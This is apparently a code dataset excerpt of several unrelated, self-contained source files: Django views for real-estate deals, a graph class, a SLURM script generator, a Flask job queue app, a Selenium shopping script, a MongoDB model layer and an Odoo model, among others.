TimeInterval.every_day:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.every_day)\n if TimeInterval(time) is TimeInterval.week_ends:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.week_ends)\n \n\n \n deal['owner'] = request.user\n deal['deal'] = de\n\n assets.pop('city')\n assets.pop('state_code')\n assets.pop('location')\n assets['owner'] = request.user\n assets['deal'] = de\n \n \n for k in assets :\n if assets[k] == '':\n assets[k] = None\n \n\n \n Adress.objects.create(owner=request.user,deal=de,city=city,state_code=state_code, location=location)\n AssetsForSale.objects.create(**assets)\n\n\n entries = [] \n \n for e in deal.T.to_dict().values():\n\n entries.append(SubscriptionDataForSale(**e))\n \n SubscriptionDataForSale.objects.bulk_create(entries)\n \n \n \n # SubscriptionDataForSale.objects.bulk_create(entries)\n\n return redirect('dashboad')\n\n return render(request, 'deal/Views/address_asset.html')\n\n\ndef deal_stats(request):\n todays_date = datetime_.date.today()\n one_month_ago = todays_date - datetime_.timedelta(days=30)\n one_year_ago = todays_date - datetime_.timedelta(days=30*12)\n one_day_ago = todays_date - datetime_.timedelta(days=1)\n \n\n deal_stats_month= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_month_ago).count()\n deal_stats_year= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_year_ago).count()\n deal_stats_day= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_day_ago).count()\n\n deal_stats_land= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"land\").count()\n deal_stats_multi_family= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"multi_family\").count()\n deal_stats_single_family= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"single_family\").count()\n deal_stats_mobile= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"mobile\").count()\n deal_stats_farm= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"farm\").count()\n deal_stats_2021= SubscriptionDataForSale.objects.filter(owner=request.user,date__icontains = \"2021\").count()\n finalrep = {'month': deal_stats_month,\n 'year':deal_stats_year,\n 'day': deal_stats_day,\n 'land': deal_stats_land,\n 'multi_family': deal_stats_multi_family,\n 'single_family': deal_stats_single_family,\n 'mobile': deal_stats_mobile,\n 'farm': deal_stats_farm,\n \"year_2021\":deal_stats_2021}\n\n return JsonResponse({'deal_category_data': finalrep}, safe=False)\n\n\ndef view_deal_detail(request, pk):\n\n deal = Deals.objects.get(pk=pk)\n\n data = SubscriptionDataForSale.objects.filter(deal_id =pk, owner=request.user)\n\n deal_df = read_frame(data)\n \n context = {\n 'deals':deal_df\n }\n return render(request,'deal/Views/deal-detail.html',context )\n\n\n\ndef deal_delete(request, pk):\n subscription = SubscriptionDataForSale.objects.filter(owner=request.user, deal_id = pk)\n setup = Setup.objects.filter(owner=request.user, deal_id = pk)\n asset = AssetsForSale.objects.filter(owner=request.user, deal_id = pk)\n address = Adress.objects.filter(owner=request.user, deal_id = pk)\n deal = Deals.objects.filter(owner=request.user, pk = pk) \n\n \n subscription.delete()\n setup.delete()\n address.delete()\n asset.delete()\n deal.delete()\n \n\n return redirect('dashboad')\n \n@login_required\ndef manage_subscriptions(request):\n \"\"\"\n Thie view is to display the subcriptions(saved deals) a user has made\n \"\"\"\n \n deal = Deals.objects.filter(owner = request.user)\n setup = Setup.objects.filter(owner = request.user)\n setupOne = Setup.objects.filter(owner = request.user).first()\n return render(request, 'deal/Views/subscriptions.html',{'deals':setup,'setup':setupOne})\n\n\ndef edit_subscriptions(request, id):\n\n setup = Setup.objects.get(pk = id)\n deals = Deals.objects.get(pk=setup.deal_id)\n\n #if request.method =='POST':\n data = request.POST\n if 'toggle' in data:\n toggle = request.POST['toggle']\n name = request.POST['name']\n time = request.POST['time']\n #import pdb\n # pdb.set_trace()\n\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n \n setup.time_interval = TimeInterval.one_min\n if TimeInterval(time) is TimeInterval.every_day:\n setup.time_interval = TimeInterval.every_day\n if TimeInterval(time) is TimeInterval.week_ends:\n setup.time_interval = TimeInterval.week_ends\n \n setup.owner= request.user\n deals.name = name\n setup.title = name\n setup.status = SetupStatus.active\n\n setup.save()\n deals.save()\n\n else:\n name = request.POST['name']\n time = request.POST['time']\n \n\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n setup.time_interval = TimeInterval.one_min\n if TimeInterval(time) is TimeInterval.every_day:\n setup.time_interval = TimeInterval.every_day\n if TimeInterval(time) is TimeInterval.week_ends:\n setup.time_interval = TimeInterval.week_ends\n \n setup.owner= request.user\n deals.name = name\n setup.title = name\n setup.status = SetupStatus.disabled\n\n setup.save()\n deals.save()\n \n\n #return JsonResponse(list(data), safe=False)\n\n return redirect('subscriptions')\n\n #return render(request, 'deal/Views/subscriptions.html')","sub_path":"deal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313416115","text":"from vertex import *\nimport pdb\n\nclass Graph(object):\n def __init__(self):\n self.vertices = {}\n\n def add_vertex(self, vertex):\n self.vertices[vertex.key] = vertex\n\n def get_vertex(self, key):\n try:\n return self.vertices[key]\n except KeyError:\n return None\n\n def __contains__(self, key):\n return key in self.vertices\n\n def add_edge(self, from_key, to_key, weight = 0):\n if from_key not in self.vertices:\n self.add_vertex(Vertex(from_key))\n if to_key not in self.vertices:\n self.add_vertex(Vertex(to_key))\n self.vertices[from_key].add_neighbor(self.vertices[to_key], weight)\n\n def get_vertices(self):\n return self.vertices.keys()\n\n def __iter__(self):\n return iter(self.vertices.values())\n\ng = Graph()\nfor i in range(6):\n g.add_vertex(Vertex(i))\n\ng.add_edge(0, 1, 5)\ng.add_edge(0, 5, 2)\ng.add_edge(1, 2, 4)\ng.add_edge(2, 3, 9)\ng.add_edge(3, 4, 7)\ng.add_edge(3, 5, 3)\ng.add_edge(4, 0, 1)\ng.add_edge(5, 4, 8)\ng.add_edge(5, 2, 1)\n\nfor v in g:\n for w in v.get_connections():\n print(str(w))\n\njson_graph = {}\nfor key, vertex in g.vertices.iteritems():\n for neighbor, weight in vertex.neighbors.iteritems():\n # pdb.set_trace()\n if json_graph.get(key) is None:\n json_graph[key] = {}\n json_graph[key][neighbor.key] = weight\n\njson_graph2 = {outer_k: {inner_k.key: inner_v for inner_k, inner_v in outer_v.neighbors.iteritems()} for outer_k, outer_v in g.vertices.iteritems()}\n\nprint(json_graph)\nprint(json_graph2)\n","sub_path":"data-structures/graphs/python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583568847","text":"import sys\nsys.setrecursionlimit(10**7)\n\ninput = sys.stdin.readline\n\nstring = input().rstrip()\nboom = input().rstrip()\nstack = []\n\nfor i in range(len(string)):\n stack.append(string[i])\n bang = False\n if len(stack) >= len(boom):\n bang = True\n for j in range(len(boom)):\n index = len(stack) - len(boom) + j\n if stack[index] != boom[j]:\n bang = False\n break\n if bang:\n for j in range(len(boom)):\n stack.pop()\n continue\n\nif stack:\n for i in stack:\n print(i, end=\"\")\nelse:\n print(\"FRULA\")","sub_path":"String/BOJ9935문자열폭발_TIN.py","file_name":"BOJ9935문자열폭발_TIN.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610254864","text":"# -*- coding: utf-8 -*-\nimport subprocess\nimport time\n\nimport click\n\nFEATURES = [\n \"TI-19\",\n # \"FI-16\",\n # \"TI-33\",\n # \"FI-2\",\n # \"FI-151\",\n # \"TI-8\",\n # \"FI-241\",\n # \"valve-position-12\", # dry-bed\n # \"FI-38\", # strippera\n # \"PI-28\", # stripper\n # \"TI-28\", # stripper\n # \"FI-20\",\n # \"FI-30\",\n \"TI-3\",\n \"FI-19\",\n # \"FI-211\",\n \"FI-11\",\n # \"TI-30\",\n # \"PI-30\",\n \"TI-1213\",\n # \"TI-4\",\n # \"FI-23\",\n # \"FI-20\",\n # \"FI-20/FI-23\",\n # \"TI-22\",\n # \"delta_t\",\n \"TI-35\",\n # \"delta_t_2\"\n]\n\nSLURM_SUBMISSION_TEMPLATE = \"\"\"#!/bin/bash -l\n#SBATCH --chdir ./\n#SBATCH --mem 32GB\n#SBATCH --ntasks 1\n#SBATCH --cpus-per-task 4\n#SBATCH --job-name {name}\n#SBATCH --time 72:00:00\n#SBATCH --partition serial\n\nsource /home/kjablonk/anaconda3/bin/activate\nconda activate aeml\n\npython -u run_gbdt_scenarios.py {feature_a} {feature_b} {objective} {forecast}\n\"\"\"\n\n\ndef write_submission_script(feature_a, feature_b, objective, forecast):\n submission_name = f\"scenario_{feature_a}_{feature_b}_{objective}_{str(forecast)}\".replace(\n \"/\", \"*\"\n )\n\n fc = \"--forecast\" if forecast else \"\"\n script_content = SLURM_SUBMISSION_TEMPLATE.format(\n **{\n \"name\": submission_name,\n \"feature_a\": feature_a,\n \"feature_b\": feature_b,\n \"objective\": objective,\n \"forecast\": fc,\n }\n )\n scriptname = f\"{submission_name}.slurm\"\n with open(scriptname, \"w\") as handle:\n handle.write(script_content)\n return scriptname\n\n\n@click.command(\"cli\")\n@click.option(\"--submit\", is_flag=True)\n@click.option(\"--forecast\", is_flag=True)\ndef run(submit, forecast):\n\n for objective in [\"amp\", \"pz\"]:\n for i, feature_a in enumerate(FEATURES):\n for j, feature_b in enumerate(FEATURES):\n if i < j:\n filename = write_submission_script(feature_a, feature_b, objective, forecast)\n if submit:\n subprocess.call(f\"sbatch {filename}\", shell=True)\n time.sleep(2)\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"paper/loop_over_maps_gbdt.py","file_name":"loop_over_maps_gbdt.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646086181","text":"import os, json\nfrom flask import Flask, request, render_template\nfrom rq import Queue\nfrom worker import conn\nfrom worker_tasks import run_script\n\napp = Flask(__name__)\nq = Queue(connection=conn)\n\ndef get_status(job):\n app_url = 'https://mnist-rdm.herokuapp.com'\n status = {\n 'id': job.id,\n 'result': job.result,\n 'status': '',\n 'message': '',\n 'link': ''\n }\n options = {\n 'status': 'failed'\n } if job.is_failed else {\n 'status': 'pending',\n 'message': 'Still working. Wait a few minutes and click the link to see if the job is ready.',\n 'link': 'Click here.'.format(app_url, job.id)\n } if job.result == None else {\n 'status': 'completed'\n }\n status.update(options)\n status.update(job.meta)\n return status\n\n@app.route(\"/\")\ndef handle_job():\n query_id = request.args.get('job')\n if query_id:\n found_job = q.fetch_job(query_id)\n if found_job:\n if found_job.result:\n response = render_template('output.html', output=found_job.result)\n else:\n response = render_template('wait.html', status=get_status(found_job))\n else:\n response = { 'id': None, 'error_message': 'No job exists with the id number ' + query_id }\n else:\n new_job = q.enqueue(run_script, timeout='1h')\n response = render_template('wait.html', status=get_status(new_job))\n return response\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333156625","text":"''''\nSplitting functions\na selection of ways to split a given area\nusing a numpy array 'd' of the CSO small area centroids\n'''\n\ndef long_side(d):\n\n # the length from East to West is compared with South to North\n # using centroid ITM coordinates\n # the new split is across the long side\n e_max = d[\"Easting\"].max()\n e_min = d[\"Easting\"].min()\n\n e_length = e_max - e_min\n\n\n n_max = d[\"Northing\"].max()\n n_min = d[\"Northing\"].min()\n\n n_length = n_max - n_min\n\n # choose to cut on longer side\n if n_length > e_length:\n axis = 'Northing'\n else:\n axis = 'Easting'\n\n return axis\n\n","sub_path":"Long_Split.py","file_name":"Long_Split.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255086576","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time, datetime\nimport requests\n\nprint(\"\"\"Availability log of the PMH service on juser.fz-juelich.de.\n\nThe check happens every minute. Times are CEDT. Only the first chunk is\nfetched. Time between re-tries is 2 seconds, or the content of the Retry-After\nheader if given. Maximal number of re-tries is 20.\n\nThe timeout for a response is 5 seconds.\n\"\"\")\n\nlast_timestamp = 0\nwhile True:\n time.sleep(max(60 - (time.time() - last_timestamp), 0))\n last_timestamp = time.time()\n print(datetime.datetime.fromtimestamp(time.time()).strftime(\"%c \"), end=\"\")\n params = {\"verb\": \"ListRecords\", \"metadataPrefix\": \"marcxml\", \"set\": \"VDB\"}\n cycles_left = 21\n while cycles_left:\n try:\n response = requests.get(\"https://juser.fz-juelich.de/oai2d\", params=params, timeout=5)\n except requests.exceptions.Timeout:\n print(\"[Timeout] \", end=\"\")\n except Exception as error:\n print(\"[Error: {}]\".format(repr(error)))\n else:\n if response.status_code == 200:\n print(\"Re-tries needed:\", 21 - cycles_left, flush=True)\n break\n cycles_left -= 1\n time.sleep(2 if response.status_code != 503 else int(response.headers.get(\"Retry-After\") or \"2\"))\n else:\n print(\"Failed.\", flush=True)\n","sub_path":"availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5295113","text":"# coding=utf-8\n__author__ = 'Bosco_Vallejo-Nágera y Miguel Tello'\nfrom pymongo import MongoClient, errors\nimport json\nfrom time import sleep\naddresses = {}\nCLIENT_VARS_PATH = \"Vars/client.ini\"\nPRODUCT_VARS_PATH = \"Vars/product.ini\"\nPROVIDER_VARS_PATH = \"Vars/provider.ini\"\nSALE_VARS_PATH = \"Vars/sale.ini\"\nSLEEP_TIME = 5\nADDRESS_SUBSTRING = \"direccion\"\n\n\ndef getCityGeoJSON(address):\n \"\"\" Devuelve las coordenadas de una direccion a partir de un str de la direccion\n Argumentos:\n address (str) -- Direccion\n Return:\n (str) -- GeoJSON\n \"\"\"\n if address in addresses:\n return addresses[address]\n else:\n from geopy.geocoders import Nominatim\n geolocator = Nominatim(user_agent=\"practica-abbdd\")\n location = geolocator.geocode(address)\n sleep(SLEEP_TIME)\n geojson = json.dumps({'type': 'Point', 'coordinates': [\n location.latitude, location.longitude]})\n addresses[address] = geojson\n return geojson\n\n\nclass ModelCursor:\n \"\"\" Cursor para iterar sobre los documentos del resultado de una\n consulta. Los documentos deben ser devueltos en forma de objetos\n modelo.\n \"\"\"\n\n def __init__(self, model_class, command_cursor):\n self.model_class = model_class\n self.command_cursor = command_cursor\n\n def next(self):\n \"\"\" Devuelve el siguiente documento en forma de modelo\n \"\"\"\n if self.alive:\n try:\n return self.model_class(**self.command_cursor.next())\n except AttributeError as err:\n print(err)\n except StopIteration:\n print(\"No more documents available in cursor\")\n else:\n print(\"No more documents avaliable in cursor\")\n\n @property\n def alive(self):\n \"\"\"True si existen más modelos por devolver, False en caso contrario\n \"\"\"\n return self.command_cursor.alive\n\n\nclass Model:\n db = None\n\n def __init__(self, **kwargs):\n required_check = []\n additional_ad = []\n required_check.extend(self.required_vars)\n self._id = None\n for k, v in kwargs.items():\n if ADDRESS_SUBSTRING in k:\n dict = {}\n for addr in v:\n dict[addr] = getCityGeoJSON(addr)\n required_check.remove(k)\n setattr(self, k, dict)\n continue\n if k not in self.required_vars:\n if k not in self.admissible_vars:\n print(\"Variable {} not admitted for the {} class\".format(\n k, type(self).__name__))\n else:\n additional_ad.append(k)\n setattr(self, k, v)\n else:\n required_check.remove(k)\n setattr(self, k, v)\n if required_check:\n raise AttributeError(\n \"Not all the required attributes were given, missing {}\".format(required_check))\n return\n self.admissible_vars.clear()\n self.admissible_vars.extend(additional_ad)\n if self._id is None:\n self.save()\n\n def save(self):\n doc = {}\n for v in self.required_vars + self.admissible_vars:\n doc[v] = getattr(self, v)\n try:\n x = db[self.collection].insert_one(doc)\n except errors.DuplicateKeyError as err:\n print(err)\n for k, v in db[self.collection].find_one({'_id': self._id}).items():\n if doc[k] == v:\n del doc[k]\n self.update(**doc)\n else:\n self._id = x.inserted_id\n self.admissible_vars.append(\"_id\")\n\n def update(self, **kwargs):\n for k, v in kwargs.items():\n db[self.collection].update_one(\n {'_id': self._id}, {'$set': {k: v}})\n\n @classmethod\n def query(cls, query):\n cursor = db[cls.collection].aggregate(query)\n return ModelCursor(cls, cursor)\n\n @classmethod\n def init_class(cls, db, vars_path):\n cls.db = db\n import configparser\n config = configparser.ConfigParser(allow_no_value=True)\n config.read(vars_path)\n cls.required_vars.extend(config['Required Variables'])\n cls.admissible_vars.extend(config['Admitted Variables'])\n\n\nclass Client(Model):\n required_vars = []\n admissible_vars = []\n collection = 'clientes'\n\n\nclass Product(Model):\n required_vars = []\n admissible_vars = []\n collection = 'productos'\n\n\nclass Sale(Model):\n required_vars = []\n admissible_vars = []\n collection = 'compras'\n\n def allocate():\n closest_warehouse = {}\n warehouses = []\n for product in self.productos:\n cursor = Product.query({'$match': {'nombre': product}})\n provider_list = []\n while cursor.alive:\n instance = cursor.next\n if instance is not None:\n provider_list.extend(instance.proveedores)\n addrs = {}\n for provider in provider_list:\n cursor_two = Provider.query({'$match': {'nombre': product}})\n\n\n\n\nclass Provider(Model):\n required_vars = []\n admissible_vars = []\n collection = 'proveedores'\n\n\nclient = MongoClient()\ndb = client.data\nProvider.init_class(db, PROVIDER_VARS_PATH)\nClient.init_class(db, CLIENT_VARS_PATH)\nSale.init_class(db, SALE_VARS_PATH)\nProduct.init_class(db, PRODUCT_VARS_PATH)\n\n# Q1: Listado de todas las compras de un cliente\nnombre_cliente = \"Ramon\"\nQ1 = []\npipeline = [{'$match': {'cliente': nombre_cliente}}]\nQ1_cursor = Sale.query(pipeline)\nwhile Q1_cursor.alive:\n instance = Q1_cursor.next()\n if instance is not None:\n Q1.append(instance)\n# Q2: Listado de todos los proveedores para un producto\nnombre_producto = \"tv\"\nQ2 = []\npipeline = [{'$match': {'nombre': nombre_producto}}]\nQ2_cursor = Product.query(pipeline)\nwhile Q2_cursor.alive:\n instance = Q2_cursor.next()\n if instance is not None:\n Q2.extend(instance.proveedores)\nQ2 = list(dict.fromkeys(Q2))\n# Q3 Listado de todos los productos diferentes comprados por un cliente\nnombre_cliente = \"Emilia\"\nQ3 = []\npipeline = [{'$match': {'cliente': nombre_cliente}}]\nQ3_cursor = Sale.query(pipeline)\nwhile Q3_cursor.alive:\n instance = Q3_cursor.next()\n if instance is not None:\n Q3.extend(instance.productos)\nQ3 = list(dict.fromkeys(Q3))\n\nif __name__ == '__main__':\n for k in Q1:\n print(\"{} {}\".format(k._id, k.direccion))\n print(Q2)\n print(Q3)\n","sub_path":"P1_G11_Bosco_Vallejo_y_Miguel_Tello.py","file_name":"P1_G11_Bosco_Vallejo_y_Miguel_Tello.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141985387","text":"from odoo import models, fields, api\n\nclass Votes(models.Model):\n\t_name = 'employee.ideas.votes'\n\t\n\tideas_id = fields.Many2one('employee.ideas','EmployeeIdeas',default=lambda self: context.get('ideas_id', False))\n\t\n\temployee = fields.Many2one('hr.employee', string='Employee', default=lambda self: self._get_default_employee(), readonly=True, store=True)\n\t\n\tdepartment = fields.Many2one('hr.department', 'department')\n\t\n\trating = fields.Selection([\n\t\t\t(0, 'Worst'),\n\t\t\t(1, 'Very Bad'),\n (2, 'Bad'),\n (3, 'Not Bad'),\n (4, 'Good'),\n (5, 'Very Good'),\n ],default=0)\n\n\tcomments = fields.Char('Comments', required=True)\n\t\n\t@api.model\n\tdef _get_default_employee(self) :\n\t\tuser_id = self.env.uid\n\t\temployee_id = self._cr.execute('SELECT hr_employee.id FROM hr_employee, resource_resource, res_user WHERE hr_employee.id = resource_resource.id AND resource_resource.user_id = ' + user_id)\n\t\treturn employee_id\n\t\t\n\t@api.multi\n\tdef write(self, vals) :\n\t\tif vals.get('employee', False) :\n\t\t\tvals['employee'] = self._get_default_employee()\n\t\t\n\t\treturn super(EmployeeIdeas, self).write(vals)\n\t\t\n\t@api.model\n\tdef create(self, vals) :\n\t\tif vals['employee'] is None:\n\t\t\tvals['employee'] = self._get_default_employee()\n\t\t\n\t\treturn super(EmployeeIdeas, self).write(vals)","sub_path":"employee_ideas/models/votes.py","file_name":"votes.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224632250","text":"s = input()\nget = input()[1:-1]\npairs = []\nfor i in range(0, len(get) - 4, 6):\n pairs.append(list(map(int, get[i:i + 5][1::2])))\nwhile True:\n over = True\n for i in range(len(pairs)):\n x = pairs[i][0]\n y = pairs[i][1]\n if s[x] > s[y]: # 如果不符合字典序,交换\n s = s[:x] + s[y] + s[x+1:y] + s[x] + s[y+1:]\n over = over and False\n if over:\n break\nprint(s)\n","sub_path":"Code/CodeRecords/2718/60632/237767.py","file_name":"237767.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177099692","text":"import unittest\nimport os\nimport tempfile\nimport main.gityo.config as config\nimport main.gityo.repo as repo\nimport main.gityo.gitx as gitx\n\n\nclass ConfigTests(unittest.TestCase):\n def test_search_config_file(self):\n file = config.search_config_file('pakyo-settings.yml')\n no_file = config.search_config_file('i-am-not-a-file')\n self.assertTrue(os.path.isfile(file))\n self.assertIsNone(no_file)\n\n def test_load_app_settings__file_not_found(self):\n def act():\n file_not_exists = tempfile.mktemp()\n config.load_app_settings(app_settings_file=file_not_exists)\n self.assertRaises(config.ConfigFileError, act)\n\n def test_load_app_settings__file_without_root(self):\n def act():\n yml = create_yml('foo:\\n'\n ' bar:\\n'\n ' value')\n config.load_app_settings(app_settings_file=yml)\n self.assertRaises(KeyError, act)\n\n def test_load_app_settings(self):\n yml = create_yml('settings:\\n'\n ' a:\\n'\n ' b\\n'\n ' c: d')\n data = config.load_app_settings(app_settings_file=yml)\n value = config.load_app_settings(key='c', app_settings_file=yml)\n self.assertEqual(data['a'], 'b')\n self.assertEqual(value, 'd')\n\n\nclass GitxTests(unittest.TestCase):\n pass\n\n\nclass RepoTests(unittest.TestCase):\n def test_load_repo_config(self):\n yml = create_yml('repos:\\n'\n ' foo:\\n'\n ' branches: dev master\\n'\n ' remote: git@git.com\\n'\n ' bar:\\n'\n ' branches: dev\\n'\n ' remote: git@xxx.com\\n')\n repos = repo.load_repo_config(yml)\n self.assertTrue(len(repos) == 3)\n self.assertTrue(len([r for r in repos if r.branch == 'dev']) == 2)\n\n def test_open__invalid_remote(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n info = repo.RepoInfo(name='foo', remote='not-a-remote', branch='dev')\n def act():\n with bucket.open(info):\n pass\n self.assertRaises(gitx.GitError, act)\n\n def test_open(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n state = r.state\n self.assertEqual(r.state, repo.RepoState.AVAILABLE)\n self.assertEqual(state, repo.RepoState.BEING_USED)\n self.assertTrue(os.path.isdir(r.root_path))\n\n def test_open_multiple_time(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n root_path = r.root_path\n repo1 = r\n with bucket.open(info) as r:\n repo2 = r\n self.assertEqual(repo1, repo2)\n self.assertEqual(root_path, repo2.root_path)\n self.assertTrue(os.path.isdir(r.root_path))\n\n def test_save_load(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n pass\n bucket.save_data()\n another_bucket = repo.RepoBucket(bucket.path)\n another_bucket.load_data()\n self.assertEqual(another_bucket.repos[0].id, bucket.repos[0].id)\n self.assertEqual(another_bucket.repos[0].root_path, bucket.repos[0].root_path)\n self.assertEqual(another_bucket.repos[0].state, bucket.repos[0].state)\n\n\n\ndef create_yml(content):\n tmp = tempfile.mkstemp()[1]\n with open(tmp, mode='w') as file:\n file.write(content)\n return tmp\n\ndef create_git_repo():\n path = tempfile.mkdtemp()\n git = gitx.Git()\n git.quiet = True\n git.cwd = path\n git.execute('init', path)\n foo_file = os.path.join(path, 'foo')\n with open(foo_file, mode='w') as f:\n f.write('bar')\n git.execute('add', foo_file)\n git.execute('config user.email \\\"no@mail.com\\\"')\n git.execute('config user.name \\\"no-one\"')\n git.execute('commit -a -m whatever')\n return path\n","sub_path":"web/tests/test_gityo.py","file_name":"test_gityo.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341181108","text":"'''\nFinding most expensive Sunscreen Programs: \nAdd all the Sunscreen to a cart of this site https://weathershopper.pythonanywhere.com/sunscreen\n----------------------------------\nPython 3.7.0 and Selenium 3.141.0\n----------------------------------\nAuthor : Srinivasa Varun\nE-mail : tcvarun96@gmail.com''' \n\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Firefox() \ndriver.maximize_window()\ndriver.get('http://weathershopper.pythonanywhere.com/sunscreen') #opening weather shopper page\n\ntime.sleep(2) #giving time for the page to load\n\ndriver1 = driver.find_elements_by_xpath(\"//p[contains(.,'Price:')]\") #X_path for the price\n\n\nlist1 = []\nlist2 = []\nfor i in driver1:\n list2.append(i.text.split(\"\\n\"))\n list1.append(i.text) #Assigning the values to a empty list\n \n#initiating two psuedo lists, slicing the above list into two other list based on their condition\npsuedo_list1 = list1[:3] \nlist3 = [int(sub.split('.')[1]) for sub in psuedo_list1]\n\npsuedo_list2 = list1[3:]\nlist4 = [int(sub.split(':')[1]) for sub in psuedo_list2]\n\n#concatenating the above two pseudo lists to as int\nconcat_list = list3+list4\nprint(concat_list)\nmax_val=max(concat_list) #finding the max value of the list\nmax_index=concat_list.index(max_val) #finding the index of the max value\nprint(max_val)\nprint(max_index)\n\n#getting all button objects to click the max priced moisturizer button\nbutton=driver.find_elements_by_xpath('//button[contains(@class,\"btn btn-primary\")]')\nbutton=button[max_index]\nbutton.click()\n\ntime.sleep(5)\n\n#Clicking the cart button and showing cart\n\ncart=driver.find_element_by_id(\"cart\")\ncart.click()\ntime.sleep(5)\n\nif(driver.current_url == \"http://weathershopper.pythonanywhere.com/cart\"):\n print(\"Successfully Added\")\nelse:\n print(\"Failure\")\n\ntime.sleep(2)\n#closing the driver\ndriver.quit()\n\n \n","sub_path":"selenium-weather-shopper/costliest-ss.py","file_name":"costliest-ss.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346711894","text":"#LPTHW Study Drill from Ex17\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv\n\nprint(f\"Copying from {from_file} to {to_file}\")\n\n#We could do these two on one line, how?\n#in_file = open(from_file)\n#indata = in_file.read()\nindata = open(from_file).read()\n\n#If we need a more simple version, we can delete the feature in line16.\n#print(f\"The input file is {len(indata)} byte long\")\n\nprint(f\"Does the output file exist?{exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\n#We can use the same way(?) in line 13 to simplify this. \n#out_file = open(to_file,\"w\")\n#out_file.write(indata)\nopen(to_file,\"w\").write(indata)\n\nprint(\"Alright, all done.\")\n\n#According to www.josharcher.uk If you open and reading/writing the\n#file immediately without storing, it will not be necessary to close the file.\n#AND there is more sources about this question on \n#https://stackoverflow.com/questions/36046167/is-there-a-need-to-close-files-that-have-no-reference-to-them/36063184#36063184\n#out_file.close()\n#in_file.close()","sub_path":"StudyDrills17.1.py","file_name":"StudyDrills17.1.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"611457813","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n AccessGrid.py\n ---------------------\n Date : January 2016\n Copyright : (C) 2016 by Spencer Gardner\n Email : spencergardner at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Spencer Gardner'\n__date__ = 'January 2016'\n__copyright__ = '(C) 2016, Spencer Gardner'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport markdown2\nfrom PyQt4.QtCore import QVariant\nfrom qgis.core import *\n\nfrom TDGAlgorithm import TDGAlgorithm\nimport processing\nfrom processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterString\nfrom processing.core.parameters import ParameterNumber\nfrom processing.core.parameters import ParameterTableField\nfrom processing.core.parameters import ParameterSelection\nfrom processing.core.outputs import OutputVector\n\nfrom processing.tools import dataobjects, vector\nfrom nxutils import NXUtils\n\nimport networkx as nx\n\nclass AccessGrid(TDGAlgorithm):\n \"\"\"This algorithm takes an input grid with the nearest\n network vertex identified and calculates the travel\n shed for each cell, counting the number of cells\n that are accessible within the shed.\n \"\"\"\n\n 